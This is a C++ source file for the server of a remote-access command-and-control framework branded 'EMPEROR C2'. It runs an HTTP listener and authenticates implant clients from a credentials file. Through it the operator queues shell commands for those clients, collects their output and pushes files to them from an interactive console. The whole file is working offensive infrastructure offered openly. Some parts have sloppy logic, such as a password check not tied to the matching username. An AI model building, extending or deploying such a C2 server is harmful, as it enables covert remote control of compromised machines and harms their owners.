#include #include #include #include #include #include #include #include // GLOBALS bool bIncomingHey = false; std::string sIncomingHeyUser; bool bShutdown = false; std::vector> retrievecreds(std::string sFile) // takes a file path as a parameter and parses the combinations of usernames and passwords from the file for insertion into // a vector of strings { std::vector> sCreds; // define 2d vector of strings for storing creds std::vector sUsernames; // vector of strings for storing usernames std::vector sPasswords; // vector of strings for storing passwords std::fstream fCreds; // filestream for reading provided file fCreds.open("creds", std::ios::in); // open file provided in parameter char ch; bool bUsername = true; // flag used to determine if username is currently being parsed, set to true by default as creds are in the form username:password std::string sUsername = ""; // string to store username std::string sPassword = ""; // string to store password while (true) // loop forever { fCreds >> ch; if (fCreds.eof()) // if the end of the credentials file has been reached { sPasswords.push_back(sPassword); // push the last password back into the vector of passwords break; // and break the loop } if (ch == ':') // if we have reached the end of the username { bUsername = false; // set the bUsername flag to false fCreds >> ch; // retrieve the next char from the file sUsernames.push_back(sUsername); // add the previous username to the sUsernames vector sUsername = ""; // set the sUsername variable to empty } if (ch == '\n') // if we have encountered a line break { bUsername = true; // set the bUsername flag to true fCreds >> ch; // retrieve the next char from the file sPasswords.push_back(sPassword); // add the previous password to the sPasswords vector sPassword = ""; // set the sPassword variable to empty } if (bUsername) // if the bUsername flag is true { sUsername += ch; // then append the retrieved char to the sUsername string } else // if the bUsername flag is false { sPassword += ch; // then append the retrieved char to the sPassword string } } sCreds.push_back(sUsernames); // add the sUsernames vector to the sCreds 2d vector sCreds.push_back(sPasswords); // add the sPasswords vector to the sCreds 2d vector return sCreds; // return the sCreds 2d vector } std::vector> sCreds = retrievecreds("creds"); // call the retrievecreds function with the filename "creds" as a parameter and save the returned vector to a 2d vector called // sCreds std::map createUserConnections(std::vector> sCreds) // takes a vector of strings containing the listed credentials and creates a dictionary containing the // username of the registered client as the key and a false boolean for later use { std::map mConnections; // define mConnections, a map containing string as the key and bool as the value for (int iUsernameIndex = 0; iUsernameIndex < sCreds[0].size(); iUsernameIndex++) // for each username in the list of credentials { mConnections[sCreds[0][iUsernameIndex]] = false; // set the value of the username to an empty string } return mConnections; // return the map } std::map createUserComms(std::vector> sCreds) // creates a dictionary containing the username of the registered client // as the key and an empty value for later use { std::map mComms; // define mComms, a map containing string as the key and value for (int iUsernameIndex = 0; iUsernameIndex < sCreds[0].size(); iUsernameIndex++) // for each username in the list of credentials { mComms[sCreds[0][iUsernameIndex]] = ""; // set the value of the username to an empty string } return mComms; // return the map } std::map> createUserFiles(std::vector> sCreds) // creates a dictionary containing the username of the registered client // as the key and an empty string pair for later use { std::map> mComms; // define mComms, a map containing string as the key and value for (int iUsernameIndex = 0; iUsernameIndex < sCreds[0].size(); iUsernameIndex++) // for each username in the list of credentials { mComms[sCreds[0][iUsernameIndex]].first = ""; // set the value of the username to an empty string mComms[sCreds[0][iUsernameIndex]].second = ""; // set the value of the username to an empty string } return mComms; // return the map } std::map mCommands = createUserComms(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of strings to // mCommands std::map mResults = createUserComms(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of string to // mResults std::map> mInFiles = createUserFiles(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of string to mOutFiles std::map> mOutFiles = createUserFiles(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of string to mOutFiles std::map mConnections = createUserConnections(sCreds); // call the defaultUserConnections function with the 2d vector sCreds as an argument, saving the returned map of // string and bool to mConnections std::string listUserConnections(std::map mConnections) // iterates through the provided mConnections map, checking if the value for a username is true and if so, it adds the // username along with a string which confirms the client is active to the oss, which is returned as string { std::ostringstream oss; // declare ostringstream oss for later use as a dynamic string for (auto const &[key, val] : mConnections) // for each key and value in mConnections, assign these to variables key and val { if (val == true) // if the value for the key is true { oss << key << " is active.\n"; // then add the key to the oss as well as a string to confirm the client is active } } std::string sConnections = oss.str(); // convert oss to string return sConnections; // return the converted string } class command_and_control : public httpserver::http_resource // class for command and control http resource { public: bool verifycreds(std::vector> sCreds, std::string sUsername, std::string sPassword) // takes 2d vector sCreds along with the provided username and password from the // client in order to verify their credentials, returns true if successful { for (int iUsernameIndex = 0; iUsernameIndex < sCreds[0].size(); iUsernameIndex++) // for each username in sCreds { if (sCreds[0][iUsernameIndex] == sUsername) // if the selected username in the vector matches the username provided by the client { for (int iPasswordIndex = 0; iPasswordIndex < sCreds[1].size(); iPasswordIndex++) // for each password in sCreds { if (sCreds[1][iPasswordIndex] == sPassword) // if the selected password in the vector matches the password provided by the client { return true; // then return true } } } } return false; // otherwise return false } const std::shared_ptr render(const httpserver::http_request &req) // responsible for rendering the http response from the server { if (verifycreds(sCreds, req.get_user(), req.get_pass())) // if the provided http auth credentials from the client are in the sCreds 2d vector { if (req.get_method() == "POST") // if the method used is post { if (req.get_arg("msg") == "ready") // if the client is initiating a connection { std::ostringstream oss; // declare ostringstream oss for response creation oss << "msg=acknowledged"; // add specific response for client to confirm connection has been established std::string sResponse = oss.str(); // convert oss to string bIncomingHey = true; // set the bIncomingHey flag to true sIncomingHeyUser = req.get_user(); // set the sIncomingHeyUser string to the value of the username used by the client mConnections[req.get_user()] = true; // set the connection value of the user in question to true return std::shared_ptr(new httpserver::string_response(sResponse)); // return the generated response to the client } else if (req.get_arg("msg") == "reqcmd") // if the client is requesting a command from the server { if (mCommands[req.get_user()] != "") // if there is a command waiting to be executed from the server { std::ostringstream oss; // declare ostringstream oss for response creation oss << "run=" << mCommands[req.get_user()]; // add command to the oss return std::shared_ptr(new httpserver::string_response(oss.str())); // return the generated response to the client } else if (mOutFiles[req.get_user()].first != "") // if there is a file waiting to be downloaded from the server { std::ostringstream oss; // declare ostringstream for response creation oss << "filename=" << mOutFiles[req.get_user()].first << "&content=" << mOutFiles[req.get_user()].second; // add filename and file content to the oss return std::shared_ptr(new httpserver::string_response(oss.str())); // return the generated response to the client } else // otherwise { return std::shared_ptr(new httpserver::string_response("msg=nocmd")); // tell the client there is no command in the queue } } else if (req.get_arg("msg") == "saved") { std::cout << "Client " << req.get_user() << " successfully saved the file." << std::endl; mOutFiles[req.get_user()].first = ""; mOutFiles[req.get_user()].second = ""; } else if (req.get_arg("msg") == "error") { std::cout << "Client " << req.get_user() << " encountered an error whilst saving the file." << std::endl; mOutFiles[req.get_user()].first = ""; mOutFiles[req.get_user()].second = ""; } else if (req.get_arg("result") != "") // if the client has submitted a result from a command { mCommands[req.get_user()] = ""; // the value for the client in the mCommands map wil be set to empty mResults[req.get_user()] = req.get_arg("result"); // the value for the client in the mResults map will be set to the returned result std::ostringstream oss; // declare osstringstream oss for response creation oss << "msg=acknowledged"; // add specific response for client to confirm that the result from the command was recieved return std::shared_ptr(new httpserver::string_response(oss.str())); // return the generated response to the client } } } return std::shared_ptr(new httpserver::string_response(req.get_content())); // otherwise return not found } }; void checkConnections() // checks if there is an incoming connection from a client, if there is then the function prints out a message stating the username connecting { while (!bShutdown) // whilst the server is not shutting down { if (bIncomingHey) // if the bIncomingHey flag is true { std::cout << "\nIncoming connection from " << sIncomingHeyUser << "\n[EMPEROR]>" << std::flush; // then print incoming connection from, with the username and finally // print the prompt on the next line bIncomingHey = false; // set the bIncomingHey flag to false sIncomingHeyUser = ""; // set the sIncomingHeyUser string to empty } } } bool uploadFile(std::string sFilename, std::string sUsername) { std::string sContent; // declare string sContent for later use sContent += sFilename + '\n'; // append filename along with a linebreak to the file content for use by the client std::ifstream fFile; // declare ifstream fFile for later use fFile.open(sFilename); // open the file provided as an argument char ch; // declare char for reading file while (fFile) // whilst the end of the file has not been reached { ch = fFile.get(); // get the next char from the file sContent += ch; // append it to the sContent string } if (sContent != "") // if the file was successfully read { mOutFiles[sUsername].first = sFilename; // then set the value of the username key in the mOutFiles map to the parsed content of the file mOutFiles[sUsername].second = sContent; // then set the value of the second value for username key in the mOutFiles map to the parsed content of the file return true; } else // otherwise { return false; // the file was not successfully read } } void downloadFile(std::string sContent, std::string sUsername) { std::ofstream fFile; // declare ifstream fFile for later use std::string sFilename; // declare string sFilename for later use for (int i = 0; i < sContent.length() - 1; i++) // for each char in the sContent string { if (sContent[i] == '\n') // if the selected char is a line break { break; } sFilename += sContent[i]; // add the selected char to the sFilename string } fFile.open(sFilename); // creatr file with provided filename fFile << sContent; // write file content to file } void interactConnection(std::string sIdentifier) // begin issuing commands to the client provided as a parameter { std::string sCommand; // declare sCommand string to store command input std::cout << "Starting interaction with " << sIdentifier << std::endl; // show the connection that the user is beginning interaction with while (true) // loop forever { std::cout << "[EMPEROR - " << sIdentifier << "]>"; // print prompt with username of connected client std::getline(std::cin, sCommand); // get user input std::regex rUpload(":u "); // compile upload regex for later use if (sCommand == ":q") // if the command is quit { break; // exit the interactive connection } else if (std::regex_search(sCommand, rUpload)) // if the command is upload { bool bFilename = false; // declare bool bFilename flag which is set to false by default bool bResult; // declare bool bResult for later use std::string sFilename; // declare string sFilename for later use for (int i = 0; i < sCommand.length(); i++) // for each char in sCommand string { if (bFilename) // if the filename is currently being parsed { sFilename += sCommand[i]; // add the currently selected char to the sFilename string } if (sCommand[i] == ' ') // if the currently selected char is a space { bFilename = true; // set the bFilename flag to true } } bResult = uploadFile(sFilename, sIdentifier); // call the uploadFile function with the filename and identifier as parameters, saving the return to the bResult bool if (bResult) // if the uploadFile function returned true { std::cout << "Command sent, awaiting response..." << std::endl; // tell the user that the command has been added to the queue and is awaiting a response while (mOutFiles[sIdentifier].first != "") // whilst the file has not been removed from the mOutFiles array { continue; // do nothing and block further execution } } else // otherwise { std::cout << "The provided file does not exist or cannot be read." << std::endl; // tell the user the file provided could not be read } } else // otherwise { mCommands[sIdentifier] = sCommand; // add the command to the value for the username key in the mCommands map std::cout << "Command sent, awaiting response..." << std::endl; // tell the user that the command has been added to the queue and is awaiting a response while (mResults[sIdentifier].empty()) // whilst the client has not submitted a result for the command { continue; // do nothing and block further execution } std::cout << "Result: " << mResults[sIdentifier] << std::endl; // when the response is submitted, print the result to the user from the mResults map mResults[sIdentifier] = ""; // set the value of the key for the client in question to an empty string } } } void prompt() { std::cout << "========== EMPEROR C2 Framework ==========" << std::endl; std::cout << R"( _____ ,888888b. .d888888888b _..-'.`*'_,88888b ,'..-..`"ad88888888b. ``-. `*Y888888b. \ `Y888888b. : Y8888888b. : Y88888888b. | _,8ad88888888. : .d88888888888888b. \d888888888888888888 8888;'''`88888888888 888' Y8888888888 `Y8 :8888888888 |` '8888888888 | 8888888888 | 8888888888 | 8888888888 | ,888888888P : ;888888888' \ d88888888' _.>, 888888P' <,--''`.._>8888( `>__...--' `''` )" << std::endl; std::cout << "=========================================" << std::endl; // print out fancy splash screen for server std::string sCommand; // declare string sCommand for storing user input while (true) // loop forever { std::cout << "[EMPEROR]>"; // print prompt std::getline(std::cin, sCommand); // get input to sCommand string std::regex rConnect("connect "); // compile rConnect regex if (sCommand == "connections") // if the user wants to list the current connections { std::cout << listUserConnections(mConnections); // then call the listUserConnections function with the argument of the mConnections map and print the return from the function } if (std::regex_search(sCommand, rConnect)) // if the user is trying to interact with a specific connection { std::vector sCommands; // declare a vector of strings sCommands which is used to store the command after it has been split std::string sSplit; // declare string sSplit for storing each section of the split string for (int i = 0; i < sCommand.length(); i++) // for each char in the sCommand string { if (sCommand[i] == ' ') // if the char is a space { sCommands.push_back(sSplit); // add the sSplit string to the sCommands vector /*if (sCommands.size() >= 2) // if the sCommands vector has two strings { break; // then break out of the for loop }*/ sSplit = ""; // set the sSplit string to empty } else // otherwise { sSplit.push_back(sCommand[i]); // add the currently selected char from the sCommand string to the sSplit string if (i == (sCommand.length() - 1)) // if the end of the sCommand string has been reached { sCommands.push_back(sSplit); // add the sSplit string to the sCommands vector } } } if (mConnections[sCommands[1]]) // if the client which the user wishes to interact with has an active connection { interactConnection(sCommands[1]); // then begin interacting with the connection, providing interactConnection with the username of the client in question } else // otherwise { std::cout << "That client is not currently connected." << std::flush; // tell the user the client is not currently connected } } if (sCommand == "q" || sCommand == "quit" || sCommand == "exit") // if the user wishes to quit { bShutdown = true; // set the bShutdown flag to true break; // break out of the while loop } } } int main(int argc, char **argv) { command_and_control c2; // instanciate the command and control class httpserver::webserver ws = httpserver::create_webserver(8665); //.use_ssl().https_mem_key("server.key").https_mem_cert("server.crt"); // create the webserver, ensuring ssl is enabled and // the server is using the provided crt and key ws.register_resource("/", &c2); // register the c2 resource at a randomly generated URL // ws.register_resource("/YVDvOraEcGwPAyjuBFzGespbRzifTpi", &c2); // register the c2 resource at a randomly generated // URL ws.start(false); // start the webserver in non-blocking mode std::thread tCheck(checkConnections); // run checkConnections in a new thread prompt(); // run the interactive prompt tCheck.join(); // after the prompt has exited, wait for the checkConnections thread to end return 0; }